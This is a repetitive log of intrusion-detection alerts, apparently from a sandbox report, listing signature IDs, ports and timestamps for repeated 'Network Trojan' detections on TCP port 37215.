          SID:2835222
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287707
          SID:2829579
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669258
          SID:2835222
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271077
          SID:2835222
          Source Port:39568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529967
          SID:2835222
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168188
          SID:2829579
          Source Port:59336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528306
          SID:2829579
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550618
          SID:2829579
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939429
          SID:2835222
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627790
          SID:2835222
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631749
          SID:2829579
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487484
          SID:2835222
          Source Port:41976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039603
          SID:2835222
          Source Port:50084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651366
          SID:2835222
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154330
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265776
          SID:2835222
          Source Port:50512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710159
          SID:2829579
          Source Port:35896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176478
          SID:2829579
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.058204
          SID:2835222
          Source Port:59902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235733
          SID:2829579
          Source Port:59886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216598
          SID:2829579
          Source Port:53600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542366
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272276
          SID:2829579
          Source Port:35602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123617
          SID:2829579
          Source Port:48800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684974
          SID:2829579
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.056855
          SID:2829579
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863861
          SID:2835222
          Source Port:55468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742369
          SID:2835222
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652403
          SID:2835222
          Source Port:55246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243938
          SID:2835222
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532780
          SID:2829579
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156762
          SID:2835222
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293910
          SID:2835222
          Source Port:45392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773980
          SID:2835222
          Source Port:47394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164617
          SID:2829579
          Source Port:51666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998380
          SID:2829579
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211471
          SID:2835222
          Source Port:52964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297751
          SID:2829579
          Source Port:58500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806688
          SID:2835222
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079660
          SID:2835222
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684956
          SID:2829579
          Source Port:53126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415898
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733143
          SID:2835222
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996185
          SID:2835222
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271213
          SID:2829579
          Source Port:59854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466226
          SID:2829579
          Source Port:43534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976670
          SID:2835222
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125271
          SID:2829579
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434903
          SID:2835222
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143858
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675409
          SID:2835222
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535261
          SID:2835222
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175530
          SID:2829579
          Source Port:42202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214148
          SID:2835222
          Source Port:50250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269771
          SID:2829579
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774341
          SID:2835222
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803290
          SID:2835222
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805568
          SID:2829579
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156295
          SID:2829579
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224975
          SID:2829579
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659576
          SID:2829579
          Source Port:47626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474185
          SID:2829579
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623079
          SID:2829579
          Source Port:58894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357186
          SID:2835222
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241939
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102736
          SID:2829579
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847628
          SID:2829579
          Source Port:52694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222408
          SID:2829579
          Source Port:34348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102813
          SID:2829579
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294647
          SID:2835222
          Source Port:34800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186068
          SID:2829579
          Source Port:41242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561652
          SID:2829579
          Source Port:40744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820988
          SID:2829579
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795952
          SID:2829579
          Source Port:47682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622227
          SID:2835222
          Source Port:37990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972206
          SID:2829579
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846987
          SID:2829579
          Source Port:37080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146396
          SID:2835222
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590802
          SID:2835222
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813682
          SID:2829579
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613687
          SID:2829579
          Source Port:32942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.616880
          SID:2835222
          Source Port:46716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195807
          SID:2835222
          Source Port:42832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923484
          SID:2829579
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287687
          SID:2835222
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332011
          SID:2835222
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151441
          SID:2835222
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845465
          SID:2829579
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530391
          SID:2829579
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861167
          SID:2829579
          Source Port:55206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080721
          SID:2835222
          Source Port:46846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356726
          SID:2829579
          Source Port:48320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399636
          SID:2835222
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224971
          SID:2835222
          Source Port:43060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326373
          SID:2829579
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662906
          SID:2835222
          Source Port:42910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048281
          SID:2835222
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436554
          SID:2829579
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924060
          SID:2835222
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847680
          SID:2829579
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271885
          SID:2829579
          Source Port:56972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083868
          SID:2829579
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337996
          SID:2829579
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893821
          SID:2829579
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441427
          SID:2835222
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051020
          SID:2829579
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2829579
          Source Port:59194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890950
          SID:2829579
          Source Port:45002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709329
          SID:2829579
          Source Port:47100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487367
          SID:2829579
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156610
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090408
          SID:2835222
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595286
          SID:2829579
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269853
          SID:2829579
          Source Port:56828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235417
          SID:2835222
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294768
          SID:2835222
          Source Port:47642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177176
          SID:2829579
          Source Port:50720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796943
          SID:2829579
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925864
          SID:2829579
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976120
          SID:2829579
          Source Port:45048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135976
          SID:2835222
          Source Port:49040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537982
          SID:2835222
          Source Port:52364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547860
          SID:2835222
          Source Port:45716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284960
          SID:2829579
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231086
          SID:2835222
          Source Port:39414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271909
          SID:2835222
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472299
          SID:2835222
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114403
          SID:2835222
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811770
          SID:2835222
          Source Port:44018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2835222
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973724
          SID:2835222
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606089
          SID:2835222
          Source Port:35902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879025
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891648
          SID:2829579
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839498
          SID:2829579
          Source Port:60566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930466
          SID:2829579
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680634
          SID:2835222
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625710
          SID:2829579
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147401
          SID:2829579
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067144
          SID:2829579
          Source Port:52494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543370
          SID:2835222
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964462
          SID:2829579
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138064
          SID:2829579
          Source Port:58168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627661
          SID:2829579
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.333459
          SID:2835222
          Source Port:60312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048733
          SID:2829579
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196766
          SID:2829579
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958843
          SID:2835222
          Source Port:47486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.303811
          SID:2829579
          Source Port:33282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196410
          SID:2835222
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821806
          SID:2829579
          Source Port:43284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891122
          SID:2829579
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227086
          SID:2835222
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195769
          SID:2835222
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162349
          SID:2829579
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438258
          SID:2829579
          Source Port:51426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131632
          SID:2829579
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265753
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710556
          SID:2835222
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551783
          SID:2829579
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229220
          SID:2829579
          Source Port:41878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288009
          SID:2835222
          Source Port:46824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923303
          SID:2829579
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497721
          SID:2829579
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710175
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885281
          SID:2829579
          Source Port:43952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840385
          SID:2835222
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102300
          SID:2835222
          Source Port:40452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017430
          SID:2829579
          Source Port:43980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338476
          SID:2829579
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326762
          SID:2829579
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924013
          SID:2829579
          Source Port:56938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425113
          SID:2829579
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633376
          SID:2829579
          Source Port:44316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656226
          SID:2829579
          Source Port:37304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125275
          SID:2835222
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987263
          SID:2829579
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486054
          SID:2835222
          Source Port:49142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154692
          SID:2835222
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299376
          SID:2835222
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147352
          SID:2829579
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214116
          SID:2835222
          Source Port:45544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188071
          SID:2829579
          Source Port:48670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242773
          SID:2835222
          Source Port:41638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196289
          SID:2835222
          Source Port:48926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811711
          SID:2829579
          Source Port:52112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849110
          SID:2829579
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975933
          SID:2829579
          Source Port:51044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269867
          SID:2829579
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764194
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551151
          SID:2835222
          Source Port:49508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323583
          SID:2835222
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656683
          SID:2835222
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655864
          SID:2835222
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607930
          SID:2829579
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552039
          SID:2829579
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868757
          SID:2829579
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655887
          SID:2835222
          Source Port:36102
          Destination Port:37215
